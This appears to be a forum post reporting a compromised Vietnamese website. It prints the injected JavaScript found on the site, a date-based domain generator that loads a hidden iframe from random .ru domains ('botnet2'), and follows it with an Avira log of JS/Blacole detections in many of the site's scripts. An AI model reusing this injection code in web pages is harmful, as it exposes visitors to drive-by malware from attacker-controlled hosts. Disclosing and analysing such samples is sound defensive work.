- function nextRandomNumber() {
- var hi = this.seed / this.Q;
- var lo = this.seed % this.Q;
- var test = this.A * lo - this.R * hi;
- if (test > 0) {
- this.seed = test;
- } else {
- this.seed = test + this.M;
- }
- return (this.seed * this.oneOverM);
- }
- function RandomNumberGenerator(unix) {
- var d = new Date(unix * 1000);
- var s = d.getHours() > 12 ? 1 : 0;
- this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
- this.A = 48271;
- this.M = 2147483647;
- this.Q = this.M / this.A;
- this.R = this.M % this.A;
- this.oneOverM = 1.0 / this.M;
- this.next = nextRandomNumber;
- return this;
- }
- function createRandomNumber(r, Min, Max) {
- return Math.round((Max - Min) * r.next() + Min);
- }
- function generatePseudoRandomString(unix, length, zone) {
- var rand = new RandomNumberGenerator(unix);
- var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
- var str = '';
- for (var i = 0; i < length; i++) {
- str += letters[createRandomNumber(rand, 0, letters.length - 1)];
- }
- return str + '.' + zone;
- }
- setTimeout(function() {
- try {
- if (typeof iframeWasCreated == "undefined") {
- iframeWasCreated = true;
- var unix = Math.round(+new Date() / 1000);
- var domainName = generatePseudoRandomString(unix, 16, 'ru');
- ifrm = document.createElement("IFRAME");
- ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
- ifrm.style.width = "0px";
- ifrm.style.height = "0px";
- ifrm.style.visibility = "hidden";
- document.body.appendChild(ifrm);
- }
- } catch (e) {}
- }, 500);
复制代码
Avira
2013/9/7 下午 02:37 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\R8AOCKPW\swfobject[1].js'
包含病毒或有害的程式 'JS/Blacole.U.2' [virus]
已採取動作:
檔案會移動至 '1d071b4b.qua' 名稱底下的隔離區目錄。.
2013/9/7 下午 02:37 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\MDC6X2XG\ieupdate[1].js'
包含病毒或有害的程式 'JS/Blacole.EB.24' [virus]
已採取動作:
檔案會移動至 '7b3f54bb.qua' 名稱底下的隔離區目錄。.
2013/9/7 下午 02:37 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\TIHYMAU3\quangcao2ben[1].js'
包含病毒或有害的程式 'JS/Blacole.U.2' [virus]
已採取動作:
檔案會移動至 '57d46e06.qua' 名稱底下的隔離區目錄。.
2013/9/7 下午 02:37 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\R8AOCKPW\vietuni[1].js'
包含病毒或有害的程式 'JS/Blacole.U.2' [virus]
已採取動作:
檔案會移動至 '4f474195.qua' 名稱底下的隔離區目錄。.
2013/9/7 下午 02:37 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVC3APW1\SpryTabbedPanels[1].js'
包含病毒或有害的程式 'JS/Blacole.EB.24' [virus]
已採取動作:
檔案會移動至 '0d1b6793.qua' 名稱底下的隔離區目錄。.
2013/9/7 下午 02:37 [System Scanner] 掃描
掃描結束 [已完成全部的掃描。]。
檔案數: 807
目錄數: 0
惡意程式碼數: 7
警告數: 0
2013/9/7 下午 02:37 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVC3APW1\jquery.tooltip[1].js'
包含病毒或有害的程式 'JS/Blacole.U.2' [virus]
已採取動作:
檔案會移動至 '3ebb79b9.qua' 名稱底下的隔離區目錄。.
2013/9/7 下午 02:37 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVC3APW1\global[1].js'
包含病毒或有害的程式 'JS/Blacole.EB.24' [virus]
已採取動作:
檔案會移動至 '41a64bdd.qua' 名稱底下的隔離區目錄。.
2013/9/7 下午 02:36 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\TIHYMAU3\player[1].js'
包含病毒或有害的程式 'JS/Blacole.U.2' [virus]
已採取動作:
檔案會移動至 '55546b3f.qua' 名稱底下的隔離區目錄。.
2013/9/7 下午 02:36 [System Scanner] 掃描
掃描結束 [已完成全部的掃描。]。
檔案數: 801
目錄數: 0
惡意程式碼數: 1
警告數: 0
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\MDC6X2XG\ieupdate[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.EB.24 [virus]'
執行的動作:傳輸至掃描程式
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\R8AOCKPW\vietuni[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.U.2 [virus]'
執行的動作:拒絕存取
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVC3APW1\global[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.EB.24 [virus]'
執行的動作:傳輸至掃描程式
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\MDC6X2XG\ieupdate[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.EB.24 [virus]'
執行的動作:拒絕存取
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/ieupdate.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.EB.24' [virus]。
已採取動作:已略過
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\TIHYMAU3\quangcao2ben[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.U.2 [virus]'
執行的動作:拒絕存取
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVC3APW1\SpryTabbedPanels[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.EB.24 [virus]'
執行的動作:拒絕存取
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\R8AOCKPW\vietuni[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.U.2 [virus]'
執行的動作:傳輸至掃描程式
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/global.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.EB.24' [virus]。
已採取動作:已略過
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/startup.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.U.2' [virus]。
已採取動作:封鎖的檔案
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/tab.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.U.2' [virus]。
已採取動作:封鎖的檔案
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/jquery.floatobject-1.0.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.EB.24' [virus]。
已採取動作:封鎖的檔案
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\TIHYMAU3\quangcao2ben[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.U.2 [virus]'
執行的動作:傳輸至掃描程式
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/vietuni.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.U.2' [virus]。
已採取動作:已略過
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVC3APW1\SpryTabbedPanels[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.EB.24 [virus]'
執行的動作:傳輸至掃描程式
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/quangcao2ben.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.U.2' [virus]。
已採取動作:已略過
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\TIHYMAU3\player[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.U.2 [virus]'
執行的動作:拒絕存取
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVC3APW1\jquery.tooltip[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.U.2 [virus]'
執行的動作:拒絕存取
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/stylesheet/SpryTabbedPanels.js"
存取資料時,
發現病毒或有害的程式 'JS/Blacole.EB.24' [virus]。
已採取動作:已略過
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\R8AOCKPW\swfobject[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.U.2 [virus]'
執行的動作:拒絕存取
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVC3APW1\jquery.tooltip[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.U.2 [virus]'
執行的動作:傳輸至掃描程式
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/jquery_cookie.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.U.2' [virus]。
已採取動作:封鎖的檔案
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/easySlider1.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.EB.24' [virus]。
已採取動作:封鎖的檔案
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\R8AOCKPW\swfobject[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.U.2 [virus]'
執行的動作:傳輸至掃描程式
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/jquery-1.3.1.min.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.EB.24' [virus]。
已採取動作:封鎖的檔案
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/cssverticalmenu.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.EB.24' [virus]。
已採取動作:封鎖的檔案
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/easySlider1.7.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.EB.24' [virus]。
已採取動作:封鎖的檔案
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/ddsmoothmenu.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.EB.24' [virus]。
已採取動作:封鎖的檔案
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/themes/vhatechno/js/jquery.tooltip.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.U.2' [virus]。
已採取動作:已略過
2013/9/7 下午 02:36 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\TIHYMAU3\player[1].js 中
偵測到病毒或有害的程式 'JS/Blacole.U.2 [virus]'
執行的動作:傳輸至掃描程式
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/swfobject.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.U.2' [virus]。
已採取動作:已略過
2013/9/7 下午 02:36 [Web Protection] 發現惡意程式碼
從 URL "http://vhatechno.vn/player.js" 存取資料時,
發現病毒或有害的程式 'JS/Blacole.U.2' [virus]。
已採取動作:已略過
|